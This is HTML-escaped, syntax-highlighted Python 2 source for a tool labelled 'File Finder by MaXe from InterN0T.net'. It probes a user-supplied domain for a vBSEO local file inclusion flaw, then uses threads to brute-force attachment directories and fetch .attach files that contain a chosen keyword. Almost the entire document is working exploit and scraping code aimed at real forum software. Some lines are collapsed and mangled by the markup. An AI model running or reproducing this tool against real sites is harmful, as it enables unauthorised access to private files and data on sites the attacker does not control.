&lt;span class=&quot;co1&quot;&gt;# Clear the screen in a sufficient way.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kw3&quot;&gt;os&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt; == &lt;span class=&quot;st0&quot;&gt;&quot;posix&quot;&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;os&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;system&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;clear&quot;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;elif&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kw3&quot;&gt;os&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt; == &lt;span class=&quot;st0&quot;&gt;&quot;nt&quot;&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;os&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;system&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;cls&quot;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;else&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[!] Cannot clear screen automatically.&lt;span class=&quot;es0&quot;&gt;\n&lt;/span&gt;&quot;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;File Finder by MaXe from InterN0T.net&lt;span class=&quot;es0&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;es0&quot;&gt;\n&lt;/span&gt;&quot;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# Get user-input and define global variables.&lt;/span&gt;&lt;br /&gt;
target = &lt;span class=&quot;kw2&quot;&gt;raw_input&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;Enter a domain to scan: &quot;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
file_match = &lt;span class=&quot;kw2&quot;&gt;raw_input&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;Enter a keyword to look for: &quot;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
main_dir = &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;attach&quot;&lt;/span&gt;,&lt;span class=&quot;st0&quot;&gt;&quot;attachment&quot;&lt;/span&gt;,&lt;span class=&quot;st0&quot;&gt;&quot;attachments&quot;&lt;/span&gt;,&lt;span class=&quot;st0&quot;&gt;&quot;download&quot;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;&lt;br /&gt;
poss_main_dir = &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;&lt;br /&gt;
sub_dir = &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# Strip away http and https from the target variable.&lt;/span&gt;&lt;br /&gt;
striptarget = &lt;span class=&quot;kw3&quot;&gt;re&lt;/span&gt;.&lt;span class=&quot;kw2&quot;&gt;compile&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&#39;(http://|https://)&#39;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
newtarget = striptarget.&lt;span class=&quot;me1&quot;&gt;sub&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&#39;&#39;&lt;/span&gt;, target&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# Perform a simple LFI to check whether the target is vulnerable or not.&lt;/span&gt;&lt;br /&gt;
conn = &lt;span class=&quot;kw3&quot;&gt;httplib&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;HTTPConnection&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;newtarget, &lt;span class=&quot;nu0&quot;&gt;80&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[*] Checking if site appears to be vulnerable.&quot;&lt;/span&gt;&lt;br /&gt;
conn.&lt;span class=&quot;me1&quot;&gt;request&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;GET&quot;&lt;/span&gt;, &lt;span class=&quot;st0&quot;&gt;&quot;/vbseo.php?vbseoembedd=1&amp;amp;vbseourl=./clientscript/ieprompt.html&quot;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
resp = conn.&lt;span class=&quot;me1&quot;&gt;getresponse&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# If the response code is 200 OK, check if the file really was included.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; resp.&lt;span class=&quot;me1&quot;&gt;status&lt;/span&gt; == &lt;span class=&quot;nu0&quot;&gt;200&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[+] Site is responding, this is good.&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;kw3&quot;&gt;re&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;search&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;(Enter text...)&quot;&lt;/span&gt;, resp.&lt;span class=&quot;me1&quot;&gt;read&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;&amp;gt;&amp;gt;The site appears to be vulnerable!&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;else&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[!] The site appears to be patched. (unknown error)&quot;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;elif&lt;/span&gt; resp.&lt;span class=&quot;me1&quot;&gt;status&lt;/span&gt; == &lt;span class=&quot;nu0&quot;&gt;404&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[!] The site appears to be patched. (404)&quot;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# Define a multi-threaded function for locating the attachment directory.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;def&lt;/span&gt; findMainDir&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;target, &lt;span class=&quot;kw3&quot;&gt;array&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;global&lt;/span&gt; poss_main_dir&lt;br /&gt;
conn = &lt;span class=&quot;kw3&quot;&gt;httplib&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;HTTPConnection&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;target, &lt;span class=&quot;nu0&quot;&gt;80&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[*] Trying: http://%s/%s/&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;target,&lt;span class=&quot;kw3&quot;&gt;array&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
conn.&lt;span class=&quot;me1&quot;&gt;request&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;HEAD&quot;&lt;/span&gt;, &lt;span class=&quot;st0&quot;&gt;&quot;/%s/&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;kw3&quot;&gt;array&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
resp = conn.&lt;span class=&quot;me1&quot;&gt;getresponse&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# If the response code is 403 (Forbidden), set a new variable and continue.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; resp.&lt;span class=&quot;me1&quot;&gt;status&lt;/span&gt; == &lt;span class=&quot;nu0&quot;&gt;403&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[+] Directory found: /%s/&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;kw3&quot;&gt;array&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; poss_main_dir == &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;:&lt;br /&gt;
poss_main_dir = &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;%s&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;kw3&quot;&gt;array&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;else&lt;/span&gt;:&lt;br /&gt;
poss_main_dir += &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;%s&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;kw3&quot;&gt;array&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
conn.&lt;span class=&quot;me1&quot;&gt;close&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# Define a multi-threaded function to scan for sub directories.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;def&lt;/span&gt; findSubDir&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;target, &lt;span class=&quot;kw3&quot;&gt;array&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;global&lt;/span&gt; sub_dir&lt;br /&gt;
i = &lt;span class=&quot;nu0&quot;&gt;0&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[*] Trying subdirs within: http://%s/%s/&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;target,&lt;span class=&quot;kw3&quot;&gt;array&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;while&lt;/span&gt; i &lt;span class=&quot;sy0&quot;&gt;&amp;amp;&lt;/span&gt;lt&lt;span class=&quot;sy0&quot;&gt;;&lt;/span&gt;= &lt;span class=&quot;nu0&quot;&gt;9&lt;/span&gt;: &amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; conn = &lt;span class=&quot;kw3&quot;&gt;httplib&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;HTTPConnection&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;target, &lt;span class=&quot;nu0&quot;&gt;80&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; conn.&lt;span class=&quot;me1&quot;&gt;request&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;HEAD&quot;&lt;/span&gt;, &amp;nbsp;&lt;span class=&quot;st0&quot;&gt;&quot;/%s/%s/&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kw3&quot;&gt;array&lt;/span&gt;,i&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt; &amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; resp = conn.&lt;span class=&quot;me1&quot;&gt;getresponse&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; resp.&lt;span class=&quot;me1&quot;&gt;status&lt;/span&gt; == &lt;span class=&quot;nu0&quot;&gt;403&lt;/span&gt;: &amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[+] Sub Directory found: /%s/%s/&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kw3&quot;&gt;array&lt;/span&gt;,i&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt; &amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; found = &lt;span class=&quot;st0&quot;&gt;&quot;%s/%s&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kw3&quot;&gt;array&lt;/span&gt;,i&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; sub_dir == &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;: &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; sub_dir = &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;%s&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; found&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt; &amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span class=&quot;kw1&quot;&gt;else&lt;/span&gt;: &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; sub_dir += &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;%s&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; found&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; i=i+&lt;span class=&quot;nu0&quot;&gt;1&lt;/span&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; conn.&lt;span class=&quot;me1&quot;&gt;close&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;co1&quot;&gt;#  Define a multi-threaded function to find our phile. # Developer Note: &amp;nbsp;  &amp;nbsp;This function has a sub-function #&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; (while) which could be  multi-threaded # &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; as well to speed up the process. def  findPhile(target,array): &amp;nbsp; i = 99 &amp;nbsp;print &quot;[*] Trying to find our file  within: /%s/&quot; % array &amp;nbsp; &amp;nbsp;while i &amp;gt;= 0:&lt;/span&gt;&lt;br /&gt;
conn = &lt;span class=&quot;kw3&quot;&gt;httplib&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;HTTPConnection&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;target, &lt;span class=&quot;nu0&quot;&gt;80&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
conn.&lt;span class=&quot;me1&quot;&gt;request&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;HEAD&quot;&lt;/span&gt;, &lt;span class=&quot;st0&quot;&gt;&quot;/%s/%s.attach&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kw3&quot;&gt;array&lt;/span&gt;,i&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
resp = conn.&lt;span class=&quot;me1&quot;&gt;getresponse&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; resp.&lt;span class=&quot;me1&quot;&gt;status&lt;/span&gt; == &lt;span class=&quot;nu0&quot;&gt;200&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[+] File found, does it match our keyword? &amp;gt;&amp;gt;%s&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; file_match&lt;br /&gt;
conn = &lt;span class=&quot;kw3&quot;&gt;httplib&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;HTTPConnection&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;target, &lt;span class=&quot;nu0&quot;&gt;80&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
conn.&lt;span class=&quot;me1&quot;&gt;request&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;GET&quot;&lt;/span&gt;, &lt;span class=&quot;st0&quot;&gt;&quot;/%s/%s.attach&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kw3&quot;&gt;array&lt;/span&gt;,i&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
resp = conn.&lt;span class=&quot;me1&quot;&gt;getresponse&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;kw3&quot;&gt;re&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;search&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;(%s)&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; file_match, resp.&lt;span class=&quot;me1&quot;&gt;read&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;&amp;gt;&amp;gt;File %s.attach contains our keyword!&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; i&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;Part URL: /%s/%s.attach&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kw3&quot;&gt;array&lt;/span&gt;,i&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;Full URL: http://&quot;&lt;/span&gt; + target + &lt;span class=&quot;st0&quot;&gt;&quot;/%s/%s.attach &lt;span class=&quot;es0&quot;&gt;\n&lt;/span&gt;&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kw3&quot;&gt;array&lt;/span&gt;,i&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;sys&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nu0&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
i=i-&lt;span class=&quot;nu0&quot;&gt;1&lt;/span&gt;&lt;br /&gt;
conn.&lt;span class=&quot;me1&quot;&gt;close&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# For each value in main_dir (array / list), start a new thread.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;for&lt;/span&gt; value &lt;span class=&quot;kw1&quot;&gt;in&lt;/span&gt; main_dir&lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;nu0&quot;&gt;0&lt;/span&gt;:&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;try&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;thread&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;start_new_thread&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;findMainDir, &lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;newtarget,value&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;time&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;sleep&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nu0&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;except&lt;/span&gt; &lt;span class=&quot;kw2&quot;&gt;KeyboardInterrupt&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;Quitting..&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;sys&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;except&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[!] Could not create any threads. Quitting..&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;sys&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nu0&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# Check if any values were assigned to the poss_main_dir array. If not, quit.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; poss_main_dir == &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[!] No directories were found, quitting.&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;sys&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;for&lt;/span&gt; value &lt;span class=&quot;kw1&quot;&gt;in&lt;/span&gt; poss_main_dir&lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;nu0&quot;&gt;0&lt;/span&gt;:&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;try&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;thread&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;start_new_thread&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;findSubDir, &lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;newtarget,value&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
